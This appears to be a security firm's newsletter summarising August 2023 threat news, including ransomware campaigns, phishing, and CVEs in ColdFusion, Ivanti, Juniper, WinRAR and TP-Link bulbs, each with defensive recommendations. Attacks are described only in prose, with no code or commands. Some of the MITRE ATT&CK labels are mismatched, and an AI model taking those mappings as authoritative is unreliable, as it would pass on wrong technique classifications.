New iOS 16 Exploit Enables Cellular Access Under Fake Airplane Mode , Cuba Ransomware Uses Veeam Exploit Against U.S. Organizations, and TP-Link Smart Bulbs Lets Hackers Steal Your WiFi Password

At a Glance

Ransomware, Malware & Phishing

1. New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode
2. NoFilter Attack: Sneaky Privilege Escalation Method Bypasses Windows Security  
3. Google Chrome's New Feature Alerts Users About Auto-Removal of Malicious Extensions
4. New BlackCat Ransomware Variant Adopts Advanced Impacket and RemCom Tools
5. New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft
6. WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams
7. HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack
8. This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers
9. Cuba Ransomware Uses Veeam Exploit Against Critical U.S. Organizations

Vulnerabilities

1. CISA Warns of Another Exploited Adobe ColdFusion Vulnerability
2. Ivanti Issues Fix for Critical Vuln in Its Sentry Gateway Technology
3. Flaws in Juniper Switches and Firewalls Can Be Chained for Remote Code Execution
4. Microsoft PowerShell Gallery vulnerable to spoofing, supply chain attacks
5. New WinRAR Vulnerability Could Allow Hackers to Take Control of Your PC  
6. TP-Link Smart Bulbs Can Let Hackers Steal Your WiFi Password

Ransomware, Malware & Phishing

New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode

Analysis: Cybersecurity researchers from Jamf Threat Labs have uncovered a novel method of post-exploit persistence on iOS 16 devices, potentially allowing attackers to maintain a foothold on compromised devices without detection. This technique involves creating a deceptive version of Airplane Mode, a feature that disables wireless communication on mobile devices. However, in this case, the attackers manipulate Airplane Mode to deceive victims into thinking their device is offline, while in reality, the attacker has implemented an artificial Airplane Mode that only restricts internet connectivity to non-attacker apps. This enables the attacker to maintain a cellular network connection for a malicious application, allowing it to operate stealthily even when the victim believes their device is in Airplane Mode.

Access Point recommends the following:

1. Keep iOS Devices Updated: Ensure that iOS devices are running the latest version of the operating system to benefit from the most recent security patches and updates that address vulnerabilities.
2. Download Apps from Trusted Sources: Only download and install applications from trusted sources, such as the official App Store. This helps minimize the risk of installing malicious software on your device.
3. Implement Mobile Device Management (MDM): Consider using MDM solutions to control all applications on devices through a managed app store. This provides organizations with greater control over the apps installed on company-owned devices.
4. Regularly Review Installed Apps: Periodically review the list of installed applications on your devices, especially within your organization. Detecting unfamiliar or suspicious apps early can help prevent potential security breaches.
5. User Education: Educate users about the potential risks associated with sophisticated attack techniques. Encourage users to remain vigilant, even when their device appears to be in Airplane Mode, and report any unusual behavior or app activity.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1322 - Modify System Image.
• T1443 - Spoofing.
• T1499 - Resource Consumption
• T1565 - Data Manipulation.
• T1566 - Phishing.

NoFilter Attack: Sneaky Privilege Escalation Method Bypasses Windows Security  

Analysis: A novel attack technique, dubbed "NoFilter," has recently been uncovered, exploiting the Windows Filtering Platform (WFP) to achieve privilege escalation in Windows operating systems. NoFilter allows an attacker with admin privileges to escalate their access to the "NT AUTHORITY\SYSTEM" level, which grants them higher privileges within the system. This discovery was presented at the DEF CON security conference and highlights a previously unknown method for privilege escalation.

Access Point Recommends the following:

1. Keep Systems Updated: It's crucial to regularly update your Windows operating system and all software with the latest security patches. Keeping systems up to date helps prevent attackers from exploiting known vulnerabilities.
2. Implement Least Privilege: Follow the principle of least privilege by limiting user and application access to the minimum necessary for their tasks. This reduces the potential impact of privilege escalation attacks.
3. Application Whitelisting: Deploy application whitelisting to allow only trusted and authorized applications to run on your system. This can prevent the execution of malicious software.
4. Robust Security Solutions: Utilize comprehensive security solutions that incorporate behavior-based detection mechanisms. These mechanisms can identify unusual activities and potential privilege escalation attempts.
5. Regular Audits: Conduct regular audits of your system to identify any unauthorized changes or activities. Early detection can help mitigate the impact of attacks.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1134 - Access Token Manipulation.
• T1055 - Process Injection.

Google Chrome's New Feature Alerts Users About Auto-Removal of Malicious Extensions

Analysis: Google is introducing a new feature in the upcoming Chrome web browser version (Chrome 117) that will proactively alert users when an installed extension has been removed from the Chrome Web Store. This feature aims to enhance user awareness and security by notifying them when an add-on has been unpublished by a developer, removed due to policy violations, or flagged as malware. Users will have options to review the extension, remove it, or hide the warning. Additionally, Google is working on automatically upgrading HTTP URLs to HTTPS URLs, even when users click on links explicitly stating HTTP, to improve security during web navigation.

Starting from mid-September 2023, Chrome will display a warning when users attempt to download high-risk files over insecure connections, reducing the risk of compromises resulting from malicious code within downloaded files. Google is also considering enabling HTTPS-First Mode by default in Incognito Mode to provide a more secure browsing experience. Users will have the option to manually enable this mode in Chrome's security settings.

Access Point recommends the following:

1. Keep Chrome Updated: Ensure that your Chrome browser is regularly updated to the latest version to benefit from the latest security enhancements and features.
2. Cautious Extension Use: Exercise caution when installing browser extensions and only install those from trusted sources. Remove or disable extensions that are no longer available on the Chrome Web Store.
3. Use HTTPS: Verify that the websites you visit use HTTPS connections to encrypt data transmission and enhance security.
4. Safe File Downloads: Avoid downloading files from untrusted or suspicious sources. Whenever possible, download files only from secure and reputable websites.
5. Security Settings: Familiarize yourself with the security settings in Chrome and consider enabling features like HTTPS-First Mode to enhance your browsing security.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1064 - Scripting.
• T1179 – Hooking.

New BlackCat Ransomware Variant Adopts Advanced Impacket and RemCom Tools

Analysis: Microsoft has reported the discovery of a new variant of the BlackCat ransomware, which includes tools like Impacket and RemCom for lateral movement and remote code execution. This variant of BlackCat has been observed in attacks by a BlackCat affiliate since July 2023.

Here are some key details about this threat:

• Impacket Tool: This tool is used for credential dumping and remote service execution, allowing the ransomware to spread within target environments.
• RemCom: RemCom, an open-source alternative to PsExec, is included in the ransomware executable for remote code execution.
• Hardcoded Compromised Credentials: The ransomware contains hardcoded compromised credentials for lateral movement and further deployment.

BlackCat is known for its continuous evolution and is associated with multiple ransomware attacks. Some ransomware groups are shifting tactics to focus on threatening to leak victims' data online if ransom demands are not met. Additionally, ransomware actors are adopting intermittent encryption techniques to speed up the encryption process and evade security solutions.

Access Point recommends the following:

1. Regular and Secure Backups: Maintain regular and secure backups of critical data to mitigate the impact of ransomware attacks. Ensure backups are stored in an isolated and secure environment.
2. Multi-Layered Security: Implement a multi-layered security approach that includes firewalls, endpoint protection, and intrusion detection systems to detect and prevent ransomware attacks.
3. Patch Management: Keep operating systems and software up to date with the latest security patches to minimize vulnerabilities that ransomware may exploit.
4. Secure Remote Access: Implement secure remote access practices, such as strong authentication and access controls, to prevent unauthorized entry into your network.
5. User Education: Educate users about ransomware threats, phishing attacks, and safe online practices to reduce the risk of infection. Phishing remains a common entry point for ransomware attacks.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1486 - Data Encrypted for Impact.
• T1490 - Inhibit System Recovery.
• T1053 - Scheduled Task/Job.

New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft

Analysis: A notable social engineering campaign, described as "mass-spreading," has recently come to light. This campaign has a specific focus on users of the Zimbra Collaboration email server, with the primary objective of acquiring their login credentials for subsequent malicious activities. It's important to note that this campaign has been ongoing since April 2023 and has been primarily directed towards small and medium-sized businesses, as well as government entities, spanning across various countries including Poland, Ecuador, Mexico, Italy, and Russia.

The modus operandi of this campaign involves the distribution of deceptive emails. These emails contain an attached HTML file, cleverly designed to resemble a legitimate Zimbra administrator's communication. This ruse is employed to lend credibility to the email. Inside the HTML file, recipients encounter a Zimbra login page that appears tailored to their specific organization. What's particularly cunning is that the victim's email address is pre-filled in the Username field, adding an extra layer of authenticity. Regrettably, once the victim enters their credentials, this sensitive information is surreptitiously harvested and transmitted to a server under the control of the malicious actors, utilizing HTTPS POST requests.

However, what sets this campaign apart from others is its capability to propagate even further. In subsequent waves of phishing attempts, the attackers utilize compromised administrator accounts from previously targeted, legitimate organizations to send emails to additional entities. This raises concerns about the potential use of password reuse by administrators who were initially targeted through phishing.

Access Point recommends the following:

1. Password Hygiene: Encourage employees to establish strong, unique passwords for their various accounts and services. This practice significantly mitigates the risks associated with password reuse.
2. Email Security Solutions: Deploy robust email security solutions within your organization. These solutions should be capable of detecting and filtering phishing emails, malicious attachments, and suspicious links effectively.
3. Multi-Factor Authentication (MFA): Implement MFA for email and other sensitive accounts. MFA adds an additional layer of security beyond traditional passwords, making it significantly more challenging for unauthorized individuals to gain access.
4. Link Verification: Train users to adopt a cautious approach when encountering links and sender addresses in emails. They should be encouraged to hover over links to reveal the actual URL and verify its authenticity before clicking.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1566 – Phishing.
• T1071 - Application Layer Protocol.

WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams

Analysis: Cybersecurity researchers have recently unveiled an updated version of the WoofLocker toolkit, a sophisticated tool primarily used for conducting tech support scams. First discovered by Malwarebytes in January 2020, WoofLocker employs JavaScript, embedded within compromised websites, to carry out anti-bot checks and traffic filtering.

One of its noteworthy features is the utilization of JavaScript that redirects unsuspecting users to browlock (browser locker) pages. To obscure its malicious intent, the toolkit employs steganographic techniques to hide JavaScript code within a PNG image. The ultimate goal is to redirect users to fraudulent call centers, where they are deceived into seeking assistance for non-existent computer issues, potentially resulting in financial losses due to the purchase of fake security solutions.

Although the campaign's tactics and techniques have largely remained consistent, its infrastructure has evolved to withstand takedown efforts. To enhance its resilience, WoofLocker now primarily targets users who visit compromised adult websites, utilizing hosting providers located in Bulgaria and Ukraine.

Access Point recommends the following:

1. Ad Blockers: Organizations are advised to employ ad blockers as part of their cybersecurity strategy to reduce exposure to potentially malicious advertisements on websites.
2. Website Scanning: Regularly scan websites, especially if you own or manage one, to detect potential compromises and vulnerabilities.
3. Security Software Updates: Keep your security software up to date to ensure protection against threats like browser lockers and tech support scams.
4. User Education: Educate users about the risks associated with tech support scams and the importance of not trusting unsolicited assistance offers.
5. Browser Security: Maintain up-to-date web browsers and configure their security settings to limit exposure to malicious scripts and techniques.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1566 - Phishing.
• T1105 - Ingress Tool Transfer.
• T1059 - Command and Scripting Interpreter.

HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack

Analysis: The threat actors behind the HiatusRAT malware have made a bold return to the cyber landscape after a period of inactivity. These malicious actors have resumed their operations, engaging in a new wave of reconnaissance and targeting activities, with a focus on organizations in Taiwan and a U.S. military procurement system. Their tenacity and determination are evident, and their identity and origin remain shrouded in mystery.

Recent targets include semiconductor and chemical manufacturers, a municipal government organization in Taiwan, and a U.S. Department of Defense (DoD) server associated with defense contracts. The HiatusRAT malware, which was first disclosed in March 2023, initially targeted business-grade routers to clandestinely spy on victims in Latin America and Europe. In this latest series of attacks, which occurred between mid-June and August 2023, HiatusRAT employed pre-built binaries designed for different architectures. The threat actors primarily honed in on Ruckus-manufactured edge devices in Taiwan.

The infrastructure underpinning HiatusRAT comprises payload and reconnaissance servers that communicate directly with victim networks. These servers are operated and managed via Tier 1 and Tier 2 servers. In the case of the DoD server, the attackers used two IP addresses to establish connections, transferring an estimated 11 MB of bi-directional data over approximately two hours. While the precise motive remains unclear, it is suspected that the threat actors were seeking publicly available information related to military contracts for potential future targeting.

Access Point recommends the following:

1. Device Updates and Patching: Regularly update and patch all devices, especially critical perimeter assets like routers and firewalls.
2. Network Monitoring: Implement robust network monitoring capabilities to detect and respond promptly to suspicious activities and unauthorized access.
3. User Education: Educate users about the risks associated with opening attachments, clicking on links, and practicing good cybersecurity hygiene.
4. Supply Chain Security: Ensure that vendors and suppliers adhere to proper security practices to prevent supply chain attacks.
5. Incident Response: Develop and maintain a comprehensive incident response plan to handle security incidents effectively.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1566 - Phishing.
• T1105 - Ingress Tool Transfer.  
• T1059 - Command and Scripting Interpreter.
• T1498 - Network Denial of Service.
• T1036 - Masquerading.

This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers

Analysis: Threat actors are taking advantage of malware-infected Windows and macOS devices to distribute a proxy server application. This application transforms these compromised machines into proxy exit nodes, rerouting proxy requests through them. While the proxy service claims to rely on informed and consenting users, there's evidence that malware writers are surreptitiously installing the proxy on infected systems.

Operated by an unnamed company, this proxy service manages a vast network of over 400,000 proxy exit nodes. Some of these nodes appear to be hijacked by malware on infected devices. The proxy software, developed in the Go programming language, targets both Windows and macOS systems. To avoid detection, Windows versions use a valid digital signature.

Malware spreads this proxy software by luring users searching for cracked software and games. Once installed, the proxy collects information about the compromised systems, including running processes, CPU and memory usage, and battery status. Furthermore, the proxy installation often comes bundled with additional malware or adware components, adding complexity to the situation.

This tactic highlights a growing trend in malware campaigns using proxy applications for unauthorized financial gains. It also underscores the increasing focus on macOS systems by threat actors, evident in the rise of information stealers and sophisticated macOS tools since 2019.

Access Point recommends the following:

1. Avoid Untrusted Sources: Refrain from downloading cracked software, games, or unauthorized content from untrusted sources, as these often serve as vehicles for malware.
2. Regular Scans: Perform regular antivirus and antimalware scans to detect and remove malicious software.
3. Keep Software Updated: Keep your operating system and applications up to date with the latest security patches.
4. Exercise Caution: Be cautious while browsing, avoid clicking on suspicious links, and refrain from downloading files from untrusted websites.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1566 - Phishing.
• T1059 - Command and Scripting Interpreter.
• T1044 - Windows Management Instrumentation.
• T1055 - Process Injection.
• T1497 - Virtualization/Sandbox Evasion.

Cuba ransomware uses Veeam exploit against critical U.S. organizations

Analysis: The Cuba ransomware gang has recently been detected targeting critical infrastructure organizations in the United States and IT firms in Latin America. This group's attack tactics blend old and new tools, showcasing their evolving and persistent threat to cybersecurity.

BlackBerry's Threat Research and Intelligence team first identified this campaign in early June 2023. Cuba has now incorporated the exploitation of CVE-2023-27532 to pilfer credentials from configuration files. Unlike brute force, they opt for compromised admin credentials via Remote Desktop Protocol (RDP). Their custom downloader, "BugHatch," establishes communication with a command and control (C2) server to download DLL files or execute commands. To disable endpoint protection tools, they employ the "Bring Your Own Vulnerable Driver" (BYOVD) technique and rely on the "BurntCigar" tool to terminate kernel processes linked to security products.

Beyond CVE-2023-27532, Cuba exploits CVE-2020-1472, also known as "Zerologon," to achieve privilege escalation against Active Directory domain controllers. Their post-exploitation phase involves the use of Cobalt Strike beacons and various "living off the land binaries" (LOLBins). While the group's origins remain uncertain, linguistic clues, targeting patterns, and infrastructure indicators suggest Russian ties. The Cuba ransomware gang primarily seeks financial gain.

The persistent threat from this group underscores the importance of timely security updates and patches, especially when proof-of-concept exploits are publicly available.

Access Point recommends the following:

1. Patch Promptly: Ensure swift application of security updates and patches to all software and systems to mitigate the risk of known vulnerabilities being exploited.
2. Strong Authentication: Implement strong authentication mechanisms, including two-factor authentication (2FA) and multi-factor authentication (MFA) for remote access.
3. Network Segmentation: Employ proper network segmentation to restrict lateral movement in case of a breach.
4. Security Monitoring: Utilize robust security monitoring to detect and respond to unusual or suspicious activities within the network.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1190 - Exploit Public-Facing Application.
• T1021 - Remote Services.
• T1055 - Process Injection.
• T1105 - Remote File Copy.
• T1053 - Scheduled Task/Job.
• T1117 - Regsvcs/Regasm.

Vulnerabilities

CISA Warns of Another Exploited Adobe ColdFusion Vulnerability

Analysis: The US Cybersecurity and Infrastructure Security Agency (CISA) has raised an alert regarding an exploited vulnerability in Adobe ColdFusion, labeled as CVE-2023-26359. This flaw, which was addressed by Adobe in their March 2023 Patch Tuesday updates, is categorized as a critical data deserialization issue, potentially allowing for arbitrary code execution. CISA has incorporated this vulnerability into its Known Exploited Vulnerabilities (KEV) Catalog and emphasizes the substantial risks it presents. In response, the agency has directed government entities to rectify this vulnerability by September 11, adhering to the Binding Operational Directive (BOD) 22-01, which mandates addressing known exploited vulnerabilities. Notably, the KEV catalog lists 12 ColdFusion vulnerabilities, with four being identified this year, and some have been utilized in combination during cyberattacks. Although specific details regarding attacks exploiting CVE-2023-26359 remain undisclosed, past incidents have shown that Adobe ColdFusion vulnerabilities attract various threat actors.

Access Point recommends the following:

1. Priority Patching: Organizations, especially government entities, should prioritize patching the vulnerability CVE-2023-26359 in Adobe ColdFusion. It is essential to adhere to CISA's directive, which sets a deadline of September 11 for addressing this specific vulnerability.
2. Heightened Vigilance: Given the historical pattern of Adobe ColdFusion vulnerabilities being exploited by various threat actors, it is imperative for all organizations to maintain a high level of vigilance.
3. Regular System Review: Organizations should regularly review and update their systems to ensure they are equipped with the latest security patches.

Ivanti Issues Fix for Critical Vuln in Its Sentry Gateway Technology

Analysis: Ivanti has released a security patch to address a critical zero-day vulnerability in its Sentry security gateway product, identified as CVE-2023-38035. This flaw, with a severity rating of 9.8 out of 10, is present in the interface used by administrators for configuring security policies. If exploited, attackers could bypass authentication controls, potentially enabling them to access sensitive APIs, change the gateway's configuration, execute system commands, and write arbitrary files on the system. The issue affects all supported Sentry versions, including 9.18, 9.17, and 9.16, as well as older, non-supported releases. The vendor emphasized that organizations not exposing port 8443 to the internet have a minimal risk. Some reports indicate that attackers are already exploiting this vulnerability.

Ivanti Sentry, previously known as MobileIron Sentry, forms a part of Ivanti's Unified Endpoint Management products portfolio. The gateway technology manages, encrypts, and protects traffic between mobile devices and backend systems. It primarily functions as a gatekeeper for an organization's Microsoft Exchange Server, ActiveSync server, or other backend systems like SharePoint server. Ivanti Sentry can also act as a Kerberos Key Distribution Center Proxy (KKDCP) server. This technology has gained traction in many businesses to ensure secure access for remote workers using personal and company-issued mobile devices. Recently, attackers exploited another vulnerability in Ivanti Endpoint Manager, CVE-2023-35078, compromising systems of 12 Norwegian government agencies. Additionally, a separate bug, CVE-2023-32560, was found in Ivanti's Avalanche mobile management technology.

Ivanti acted promptly upon the identification of CVE-2023-38035, as reported by security vendor mnemonic. They have prepared RedHat Package Manager (RPM) scripts tailored for each supported version to address the vulnerability. Ivanti has cautioned organizations to apply the correct RPM script corresponding to their Sentry version. Applying the wrong script may not only fail to fix the vulnerability but could also destabilize the system.  

Access Point recommends the following:

1. Patch Application: Organizations using Ivanti Sentry security gateway products, especially versions 9.18, 9.17, and 9.16, should promptly apply the security patch released by Ivanti to address the critical zero-day vulnerability (CVE-2023-38035).
2. Access Restriction: To enhance security, it is imperative to restrict access to the administrator portal exclusively to internal management networks. Specifically, avoid exposing port 8443 to the internet.
3. Script Selection: When applying the provided RedHat Package Manager (RPM) scripts, organizations must ensure they choose the appropriate script corresponding to their Sentry version. This step is crucial to prevent system instability or ineffective remediation.

Flaws in Juniper Switches and Firewalls Can Be Chained for Remote Code Execution

Analysis: Juniper Networks, the networking appliances manufacturer, has issued patches for four vulnerabilities detected in the J-Web interface of Junos OS. These vulnerabilities, designated as CVE-2023-36844 to CVE-2023-36847, possess a 'medium' severity individually. Yet, when exploited in tandem, they escalate to a 'critical severity' level. The first two, CVE-2023-36844 and CVE-2023-36845, pertain to PHP external variable modification issues that potentially let remote attackers alter environment variables without needing authentication. These vulnerabilities, when exploited, can compromise the system's integrity. The latter pair, CVE-2023-36846 and CVE-2023-36847, involve authentication lapses that enable attackers to arbitrarily upload files, affecting the system's file integrity. Juniper advises taking precautionary measures by either disabling the J-Web interface or granting access solely to trusted hosts.

These identified vulnerabilities predominantly affect the SRX series firewalls and EX series switches that operate on specific Junos OS versions. Consequently, users of the SRX and EX series are encouraged to promptly upgrade to the most recent Junos OS versions. While Juniper hasn't reported any active exploitation of these vulnerabilities, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has cautioned that if exploited, these vulnerabilities might trigger denial-of-service (DoS) conditions.

Access Point recommends the following:

1. Patch Application: Organizations utilizing Juniper Networks' SRX series firewalls and EX series switches should urgently apply the patches released by Juniper for the four vulnerabilities identified in the J-Web interface of Junos OS. These patches are essential to mitigate potential risks effectively.
2. Access Restriction: As a preventive measure, businesses can either disable the J-Web interface if it is not necessary for their operations, or restrict its access solely to trusted hosts. This reduces the attack surface and enhances security.
3. OS Upgrade: Ensuring that devices are upgraded to the latest Junos OS versions can further enhance security by incorporating the latest fixes and improvements.

Given the potential severity of these vulnerabilities, it is crucial for organizations to take immediate action, even if no active exploits have been reported as of now. By following these recommendations, organizations can effectively safeguard their network infrastructure.

Microsoft PowerShell Gallery vulnerable to spoofing, supply chain attacks

Analysis: Microsoft's PowerShell Gallery, a prominent code repository hosting numerous scripts and modules, has come under scrutiny for lax naming protocols that can facilitate typosquatting attacks, where malicious actors could spoof popular packages, paving the way for potential supply chain attacks. AquaSec's Nautilus team revealed the ability for users to upload packages with names almost identical to existing ones on PS Gallery, as demonstrated by the example of the "AzTable" module which could be mirrored as 'Az.Table'. This issue is compounded by the possibility to mimic module details like Author and Copyright. Additionally, they identified another flaw that permits the exposure of hidden packages which are typically not indexed by the Gallery’s search engine. An XML file was discovered that detailed both listed and unlisted packages, providing an open gateway to the entire PowerShell package database, thus enabling access to potentially sensitive data within these unlisted packages.

Despite AquaSec reporting these vulnerabilities in September 2022, as of August 16, 2023, the issues remained unresolved. Microsoft initially responded in early November 2022, asserting that they had addressed the problems. However, subsequent testing by AquaSec in December 2022 showed that the vulnerabilities could still be exploited. By January 15, 2023, Microsoft shared that they had put a temporary solution in place while working on a more permanent fix, particularly for the name typosquatting and package detail spoofing problems. Microsoft emphasized that the report's concerns largely depend on social engineering for success. They've implemented some changes to identify and remove suspicious packages and urged users to report any dubious modules.

Access Point recommends the following:

1. Execute Only Signed Scripts: Execute PowerShell scripts that are digitally signed. Digital signatures provide a level of assurance that the script has not been tampered with and comes from a trusted source.
2. Utilize Dependable Private Repositories: Consider using private PowerShell repositories where you have control over the modules and scripts that are available. This reduces the risk of inadvertently downloading malicious code.
3. Frequent Scans for Sensitive Data: Regularly scan module source code for sensitive data or vulnerabilities. This proactive approach can help detect and remediate issues before they are exploited.
4. Real-Time Monitoring: Establish real-time monitoring systems in your cloud setups to spot any anomalous activities. This can help detect and respond to suspicious behavior promptly.

New WinRAR Vulnerability Could Allow Hackers to Take Control of Your PC  

Analysis: RARLAB, the developers behind popular file archiving software WinRAR have fixed a potential remote code execution vulnerability possible on Windows systems. The vulnerability known as CVE-2023-40477 does require user interaction as a user must be lured to a malicious page or open a specifically crafted file. CVE-2023-40477 (CVSS score: 7.8) is described as a case of improper validation while processing recovery volumes. The flaw can result in unauthorized memory access extending beyond the allocated buffer’s boundaries which can allow an attacker to use this vulnerability to execute code in the process’s context.

This vulnerability was found by the Zero Day Initiative, specifically by a researcher who goes by the name goodbyeselene. They were credited with finding and letting RARLABs know about this bug.

RARLAB has released a fix in version 6.23 of WinRAR as an update to this version and any version after should remediate this vulnerability.

Access Point recommends the following:

1. Update WinRAR: Access Point Technology recommends that all users of WinRAR software, whether for corporate or personal reasons, promptly update to version 6.23. This update addresses not only the specific flaw mentioned but also several other vulnerabilities. Keeping your software up-to-date is a critical step in maintaining the security and functionality of your systems.

TP-Link smart bulbs can let hackers steal your WiFi password

Analysis: Researchers from University of Catania and the University of London analyzed the TP-Link Tapo L530E smart bulb and TP-Link’s Tapo app. This Bulb was chosen as it was the top-selling smart bulb on many marketplaces like Amazon and it’s smart device management app with over 10 million installations on Google Play Store.

The goal of this research was to find security risks in the billions of IoT devices used by consumers on a day-today basis which feature “risky data transmission and lackluster authentication safeguards”.

The researchers identified four distinct vulnerabilities in their study.

The first vulnerability relates to improper authentication in the Tapo L503E bulb, presenting a significant security concern (CVSS v3.1 score: 7.6). This flaw permits potential attackers in close proximity to impersonate the device during the session key exchange phase. Consequently, they can steal Tapo user passwords and manipulate connected Tapo devices.

The second flaw, also categorized as high severity, allows attackers to acquire a hard-coded, short checksum shared secret through methods like brute-forcing or decompiling the application.

The third issue, rated as a medium severity concern, unveiled a deficiency in randomness during symmetric encryption, undermining the cryptographic scheme's ability to remain unpredictable.

Lastly, the fourth problem revolves around a lack of checks for message freshness. This lapse results in session keys remaining valid for an extended period of 24 hours, enabling attackers to replay messages during this timeframe.

The researchers found that utilizing the first two vulnerabilities an attacker can extract the victim’s Wifi SSID and password and gain access to all other devices connected to that network. Vulnerability one can also be used in a man-in-the-middle attack to intercept and manipulate communication between the app and the bulb by capturing the RSA encryption keys.

Access Point recommends the following:

1. Isolate and Update TP-Link Smart Bulbs: Access Point Technology advises all users of TP-Link smart bulbs to isolate these devices from critical networks and ensure they are updated with the latest firmware. TP-Link is actively working on addressing these security issues, and keeping your smart bulb firmware up-to-date is essential for security. IoT devices, in general, can pose security risks due to the lack of industry-wide cybersecurity standards, encryption, and timely firmware updates. Exercise caution when adding any IoT device to your network and consider isolating them to minimize potential vulnerabilities.

Sources

https://thehackernews.com/2023/08/new-apple-ios-16-exploit-enables.html

https://thehackernews.com/2023/08/nofilter-attack-sneaky-privilege.html

https://thehackernews.com/2023/08/google-chromes-new-feature-alerts-users.html

https://thehackernews.com/2023/08/new-blackcat-ransomware-variant-adopts.html

https://thehackernews.com/2023/08/new-wave-of-attack-campaign-targeting.html

https://thehackernews.com/2023/08/wooflocker-toolkit-hides-malicious.html

https://thehackernews.com/2023/08/hiatusrat-malware-resurfaces-taiwan.html

https://thehackernews.com/2023/08/this-malware-turned-thousands-of-hacked.html

https://www.bleepingcomputer.com/news/security/cuba-ransomware-uses-veeam-exploit-against-critical-us-organizations/

https://usc-word-edit.officeapps.live.com/we/securityweek.com/cisa-warns-of-another-exploited-adobe-coldfusion-vulnerability/

https://www.darkreading.com/attacks-breaches/ivanti-issues-fix-for-critical-vuln-in-its-sentry-gateway-technology

https://www.securityweek.com/flaws-in-juniper-switches-and-firewalls-can-be-chained-for-remote-code-execution/

https://www.bleepingcomputer.com/news/security/microsoft-powershell-gallery-vulnerable-to-spoofing-supply-chain-attacks/

https://thehackernews.com/2023/08/new-winrar-vulnerability-could-allow.html

https://www.bleepingcomputer.com/news/security/tp-link-smart-bulbs-can-let-hackers-steal-your-wifi-password/

‍